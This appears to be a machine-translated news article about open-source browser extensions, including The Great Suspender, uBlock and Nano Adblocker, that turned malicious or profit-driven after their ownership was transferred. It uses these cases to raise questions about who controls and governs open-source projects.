On February 4, millions of browser tags suddenly ended. The great suspender, an open source extension of chrome, launched a malicious update in October last year after changing its maintainer. Google finally decided to forcibly remove the extension four months later.This incident highlights the control issues in open source projects. Who owns the code for open source projects? The original founder? Is it a maintainer? Or the whole community?
Most open source projects do not have a special foundation or governance system to manage them. Hosting platforms such as GitHub allow multiple individuals or core contribution teams to control projects, but in distribution channels such as Chrome web store or Apple App store, only individuals can control project accounts and be responsible for the release of each version.
The function of the great suspender is to suspend inactive tabs. Its maintainer Dean oecke decided to switch to other projects in June 2020. He transferred the ownership of GitHub library and web store to an undisclosed person. Extended users certainly don't care about the transfer of ownership, but they are about to face the impact of this transfer. Last October, the new maintainer released an update that included downloading and executing JS files for third-party domain names.
The change also turns off automatic updates, which means that even if malicious code is removed, existing users will continue to use the malicious version. This is not the first time that an open source project has become malicious after it has been transferred. Raymond Hill transferred the ownership of ublock to Chris aljoudi, a new defender. As a result, he used the project to make a profit and even allowed advertisers to pay to avoid blocking. This led Raymond hill to create branch ublock origin.
Hugo Xu's extensions nano adblocker and nano defender are based on ublock origin after the ownership of the project was transferred to Turkish developersIt becomes a malicious application.